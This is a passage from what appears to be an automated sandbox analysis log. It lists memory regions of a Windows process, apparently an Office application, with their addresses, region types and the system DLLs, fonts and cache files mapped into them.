"\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 503 start_va = 0x1fe14150000 end_va = 0x1fe1427ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14150000" filename = "" Region: id = 504 start_va = 0x1fe0ca20000 end_va = 0x1fe0ca2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0ca20000" filename = "" Region: id = 505 start_va = 0x1fe0ca30000 end_va = 0x1fe0ca3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0ca30000" filename = "" Region: id = 506 start_va = 0x7ff745d60000 end_va = 0x7ff745d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff745d60000" filename = "" Region: id = 507 start_va = 0x1fe0ca20000 end_va = 0x1fe0ca23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 508 start_va = 0x1fe12570000 end_va = 0x1fe125b4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000010.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000010.db") Region: id = 509 start_va = 0x1fe0ca30000 end_va = 0x1fe0ca33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 510 start_va = 0x1fe14150000 end_va = 0x1fe141ddfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 511 start_va = 0x1fe14270000 end_va = 0x1fe1427ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14270000" filename = "" Region: id = 512 start_va = 0x1fe125c0000 end_va = 0x1fe125d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 513 start_va = 0x1fe0ca40000 end_va = 0x1fe0ca41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0ca40000" filename = "" Region: id = 514 start_va = 0x1fe125e0000 end_va = 0x1fe125e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe125e0000" filename = "" Region: id = 515 start_va = 0x1fe125f0000 end_va = 0x1fe125f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe125f0000" filename = "" Region: id = 516 start_va = 0x1fe16530000 end_va = 0x1fe16616fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 517 start_va = 0x1fe16530000 end_va = 0x1fe16616fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 518 start_va = 0x7fffd80e0000 end_va = 0x7fffd823bfff monitored = 0 entry_point = 0x7fffd8125be0 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 519 start_va = 0x7fffec520000 end_va = 0x7fffec53efff monitored = 0 entry_point = 0x7fffec525d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 520 start_va = 0x1fe125f0000 end_va = 0x1fe125f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe125f0000" filename = "" Region: id = 521 start_va = 0x1fe16530000 end_va = 0x1fe16616fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 522 start_va = 0x1fe1a3a0000 end_va = 0x1fe1a75cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe1a3a0000" filename = "" Region: id = 523 start_va = 0x1fe1a760000 end_va = 0x1fe1ab1cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe1a760000" filename = "" Region: id = 524 start_va = 0x1fe16620000 end_va = 0x1fe1671ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16620000" filename = "" Region: id = 525 start_va = 0x1fe13f30000 end_va = 0x1fe13f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe13f30000" filename = "" Region: id = 526 start_va = 0x1fe141e0000 end_va = 0x1fe141effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe141e0000" filename = "" Region: id = 527 start_va = 0x1fe141f0000 end_va = 0x1fe141fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe141f0000" filename = "" Region: id = 528 start_va = 0x1fe14200000 end_va = 0x1fe1420ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14200000" filename = "" Region: id = 529 start_va = 0x1fe141f0000 end_va = 0x1fe141fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe141f0000" filename = "" Region: id = 530 start_va = 0x1fe14200000 end_va = 0x1fe1420ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14200000" filename = "" Region: id = 531 start_va = 0x1fe141f0000 end_va = 0x1fe141fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe141f0000" filename = "" Region: id = 532 start_va = 0x1fe14200000 end_va = 0x1fe1420ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14200000" filename = "" Region: id = 533 start_va = 0x1fe14210000 end_va = 0x1fe1421ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14210000" filename = "" Region: id = 534 start_va = 0x1fe14220000 end_va = 0x1fe1422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14220000" filename = "" Region: id = 535 start_va = 0x1fe14210000 end_va = 0x1fe1421ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14210000" filename = "" Region: id = 536 start_va = 0x1fe14220000 end_va = 0x1fe1422ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14220000" filename = "" Region: id = 537 start_va = 0x1fe14230000 end_va = 0x1fe1423ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14230000" filename = "" Region: id = 538 start_va = 0x1fe14240000 end_va = 0x1fe1424ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14240000" filename = "" Region: id = 539 start_va = 0x1fe14250000 end_va = 0x1fe1425ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14250000" filename = "" Region: id = 540 start_va = 0x7fffedf40000 end_va = 0x7fffedf46fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 541 start_va = 0x1fe14210000 end_va = 0x1fe14221fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 542 start_va = 0x7fffe2470000 end_va = 0x7fffe247cfff monitored = 0 entry_point = 0x7fffe2471ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 543 start_va = 0x7fffe2590000 end_va = 0x7fffe266afff monitored = 0 entry_point = 0x7fffe25a28b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 544 start_va = 0x7fffe2560000 end_va = 0x7fffe2585fff monitored = 0 entry_point = 0x7fffe2561cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 545 start_va = 0x1fe14230000 end_va = 0x1fe14230fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe14230000" filename = "" Region: id = 546 start_va = 0x1fe14240000 end_va = 0x1fe1424cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe14240000" filename = "" Region: id = 547 start_va = 0x1fe14250000 end_va = 0x1fe1425cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe14250000" filename = "" Region: id = 548 start_va = 0x7fffe4f60000 end_va = 0x7fffe4f71fff monitored = 0 entry_point = 0x7fffe4f63580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 549 start_va = 0x1fe14260000 end_va = 0x1fe14260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe14260000" filename = "" Region: id = 550 start_va = 0x1fe1ab20000 end_va = 0x1fe1ac20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1ab20000" filename = "" Region: id = 551 start_va = 0x1fe1ab20000 end_va = 0x1fe1ac20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1ab20000" filename = "" Region: id = 552 start_va = 0x1fe1ab20000 end_va = 0x1fe1ac20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1ab20000" filename = "" Region: id = 553 start_va = 0x1fe14260000 end_va = 0x1fe14260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe14260000" filename = "" Region: id = 554 start_va = 0x1fe1ab20000 end_va = 0x1fe1ac20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1ab20000" filename = "" Region: id = 555 start_va = 0x1fe1ab20000 end_va = 0x1fe1ac20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1ab20000" filename = "" Region: id = 556 start_va = 0x7fffeb610000 end_va = 0x7fffeb663fff monitored = 0 entry_point = 0x7fffeb62cecc region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\msproof7.dll" (normalized: "c:\\program files\\microsoft office\\office16\\msproof7.dll") Region: id = 557 start_va = 0x1fe14260000 end_va = 0x1fe14260fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "custom.dic" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\custom.dic") Region: id = 558 start_va = 0x1fe14260000 end_va = 0x1fe14261fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14260000" filename = "" Region: id = 559 start_va = 0x1fe14280000 end_va = 0x1fe14280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14280000" filename = "" Region: id = 560 start_va = 0x1fe16720000 end_va = 0x1fe1672ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16720000" filename = "" Region: id = 561 start_va = 0x1fe16730000 end_va = 0x1fe1673ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16730000" filename = "" Region: id = 562 start_va = 0x7ff745d50000 end_va = 0x7ff745d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff745d50000" filename = "" Region: id = 563 start_va = 0x1fe16720000 end_va = 0x1fe1672ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16720000" filename = "" Region: id = 564 start_va = 0x1fe1ab20000 end_va = 0x1fe1ac15fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 565 start_va = 0x1fe16720000 end_va = 0x1fe16721fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16720000" filename = "" Region: id = 566 start_va = 0x1fe16730000 end_va = 0x1fe16731fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16730000" filename = "" Region: id = 567 start_va = 0x1fe16740000 end_va = 0x1fe16741fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16740000" filename = "" Region: id = 568 start_va = 0x1fe16750000 end_va = 0x1fe16751fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16750000" filename = "" Region: id = 569 start_va = 0x1fe16760000 end_va = 0x1fe16760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16760000" filename = "" Region: id = 570 start_va = 0x1fe1ac20000 end_va = 0x1fe1ace5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibril.ttf" filename = "\\Windows\\Fonts\\calibril.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf") Region: id = 571 start_va = 0x1fe16770000 end_va = 0x1fe16771fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16770000" filename = "" Region: id = 572 start_va = 0x1fe16780000 end_va = 0x1fe16781fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16780000" filename = "" Region: id = 573 start_va = 0x1fe16790000 end_va = 0x1fe16791fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16790000" filename = "" Region: id = 574 start_va = 0x1fe167a0000 end_va = 0x1fe167a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe167a0000" filename = "" Region: id = 575 start_va = 0x1fe167b0000 end_va = 0x1fe167b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe167b0000" filename = "" Region: id = 576 start_va = 0x1fe167c0000 end_va = 0x1fe167c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe167c0000" filename = "" Region: id = 577 start_va = 0x1fe167d0000 end_va = 0x1fe167d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe167d0000" filename = "" Region: id = 578 start_va = 0x1fe167e0000 end_va = 0x1fe167e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe167e0000" filename = "" Region: id = 579 start_va = 0x1fe1acf0000 end_va = 0x1fe1ade3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 580 start_va = 0x1fe167f0000 end_va = 0x1fe167f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe167f0000" filename = "" Region: id = 581 start_va = 0x1fe16800000 end_va = 0x1fe16801fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16800000" filename = "" Region: id = 582 start_va = 0x1fe184a0000 end_va = 0x1fe184a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe184a0000" filename = "" Region: id = 583 start_va = 0x1fe184b0000 end_va = 0x1fe184b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe184b0000" filename = "" Region: id = 584 start_va = 0x1fe1adf0000 end_va = 0x1fe1adf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1adf0000" filename = "" Region: id = 585 start_va = 0x1fe1ae00000 end_va = 0x1fe1ae01fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1ae00000" filename = "" Region: id = 586 start_va = 0x1fe14260000 end_va = 0x1fe1426ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14260000" filename = "" Region: id = 587 start_va = 0x1fe14280000 end_va = 0x1fe1428ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe14280000" filename = "" Region: id = 588 start_va = 0x7fffd9100000 end_va = 0x7fffd918cfff monitored = 0 entry_point = 0x7fffd91077b8 region_type = mapped_file name = "msgr8es.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\PROOF\\3082\\MSGR8ES.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\proof\\3082\\msgr8es.dll") Region: id = 589 start_va = 0x1fe14260000 end_va = 0x1fe14260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe14260000" filename = "" Region: id = 590 start_va = 0x1fe14280000 end_va = 0x1fe1428ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe14280000" filename = "" Region: id = 591 start_va = 0x1fe16720000 end_va = 0x1fe1672ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16720000" filename = "" Region: id = 592 start_va = 0x1fe16740000 end_va = 0x1fe16741fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16740000" filename = "" Region: id = 593 start_va = 0x1fe16770000 end_va = 0x1fe16770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe16770000" filename = "" Region: id = 594 start_va = 0x7fffecc80000 end_va = 0x7fffecd18fff monitored = 0 entry_point = 0x7fffeccaf4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 595 start_va = 0x7fffdc1c0000 end_va = 0x7fffdc1d0fff monitored = 0 entry_point = 0x7fffdc1c2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 596 start_va = 0x7fffdf030000 end_va = 0x7fffdf0aefff monitored = 0 entry_point = 0x7fffdf047110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 597 start_va = 0x7fffdbe50000 end_va = 0x7fffdbe63fff monitored = 0 entry_point = 0x7fffdbe51800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 598 start_va = 0x7fffdbe90000 end_va = 0x7fffdbf85fff monitored = 0 entry_point = 0x7fffdbec9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 602 start_va = 0x7fffe9320000 end_va = 0x7fffe93e7fff monitored = 0 entry_point = 0x7fffe93613f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 603 start_va = 0x7fffe5d70000 end_va = 0x7fffe5da7fff monitored = 0 entry_point = 0x7fffe5d88cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 604 start_va = 0x7ffff0530000 end_va = 0x7ffff0537fff monitored = 0 entry_point = 0x7ffff0531ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 605 start_va = 0x7fffe5bd0000 end_va = 0x7fffe5be5fff monitored = 0 entry_point = 0x7fffe5bd19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 606 start_va = 0x7fffe5bb0000 end_va = 0x7fffe5bc9fff monitored = 0 entry_point = 0x7fffe5bb2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 607 start_va = 0x7fffe5290000 end_va = 0x7fffe52a4fff monitored = 0 entry_point = 0x7fffe5292dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 608 start_va = 0x7fffdcd60000 end_va = 0x7fffdcfedfff monitored = 0 entry_point = 0x7fffdce30f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 609 start_va = 0x1fe14260000 end_va = 0x1fe14260fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 610 start_va = 0x7fffec690000 end_va = 0x7fffec6ebfff monitored = 0 entry_point = 0x7fffec6a6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 611 start_va = 0x7fffe6390000 end_va = 0x7fffe639afff monitored = 0 entry_point = 0x7fffe6391d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 612 start_va = 0x7fffeb830000 end_va = 0x7fffeb8d9fff monitored = 0 entry_point = 0x7fffeb857910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 613 start_va = 0x7fffe51f0000 end_va = 0x7fffe526ffff monitored = 0 entry_point = 0x7fffe521d280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 614 start_va = 0x7fffe5010000 end_va = 0x7fffe5019fff monitored = 0 entry_point = 0x7fffe50114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 615 start_va = 0x7fffe5710000 end_va = 0x7fffe5776fff monitored = 0 entry_point = 0x7fffe57163e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 616 start_va = 0x1fe14280000 end_va = 0x1fe14282fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 617 start_va = 0x1fe16790000 end_va = 0x1fe16799fff monitored = 0 entry_point = 0x1fe167915c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 618 start_va = 0x1fe167b0000 end_va = 0x1fe167b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 619 start_va = 0x1fe16790000 end_va = 0x1fe16799fff monitored = 0 entry_point = 0x1fe167915c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 620 start_va = 0x1fe167b0000 end_va = 0x1fe167b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 621 start_va = 0x1fe16790000 end_va = 0x1fe16799fff monitored = 0 entry_point = 0x1fe167915c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 622 start_va = 0x1fe167b0000 end_va = 0x1fe167b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 623 start_va = 0x1fe16790000 end_va = 0x1fe16799fff monitored = 0 entry_point = 0x1fe167915c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 624 start_va = 0x1fe167b0000 end_va = 0x1fe167b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 625 start_va = 0x7fffec310000 end_va = 0x7fffec389fff monitored = 0 entry_point = 0x7fffec331a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 626 start_va = 0x7fffed940000 end_va = 0x7fffedb06fff monitored = 0 entry_point = 0x7fffed99db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 627 start_va = 0x7fffece30000 end_va = 0x7fffece3ffff monitored = 0 entry_point = 0x7fffece356e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 628 start_va = 0x1fe16790000 end_va = 0x1fe16791fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe16790000" filename = "" Region: id = 629 start_va = 0x1fe167b0000 end_va = 0x1fe167b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe167b0000" filename = "" Region: id = 630 start_va = 0x7fffdb7d0000 end_va = 0x7fffdb7e3fff monitored = 0 entry_point = 0x7fffdb7d3710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 631 start_va = 0x7fffec930000 end_va = 0x7fffec956fff monitored = 0 entry_point = 0x7fffec940aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 632 start_va = 0x7fffec8f0000 end_va = 0x7fffec929fff monitored = 0 entry_point = 0x7fffec8f8d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 633 start_va = 0x1fe167d0000 end_va = 0x1fe167d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe167d0000" filename = "" Region: id = 634 start_va = 0x5f80600000 end_va = 0x5f806fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005f80600000" filename = "" Region: id = 635 start_va = 0x7fffdb880000 end_va = 0x7fffdb89dfff monitored = 0 entry_point = 0x7fffdb88ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 636 start_va = 0x1fe167b0000 end_va = 0x1fe167b9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 637 start_va = 0x5f80700000 end_va = 0x5f807fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005f80700000" filename = "" Region: id = 638 start_va = 0x7fffdb600000 end_va = 0x7fffdb761fff monitored = 0 entry_point = 0x7fffdb651b30 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 639 start_va = 0x7fffec410000 end_va = 0x7fffec419fff monitored = 0 entry_point = 0x7fffec411830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 640 start_va = 0x1fe167d0000 end_va = 0x1fe167d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe167d0000" filename = "" Region: id = 641 start_va = 0x1fe167f0000 end_va = 0x1fe167f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe167f0000" filename = "" Region: id = 642 start_va = 0x1fe1ae10000 end_va = 0x1fe1bddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1ae10000" filename = "" Region: id = 643 start_va = 0x7fffe38d0000 end_va = 0x7fffe3919fff monitored = 0 entry_point = 0x7fffe38d5800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 644 start_va = 0x1fe16790000 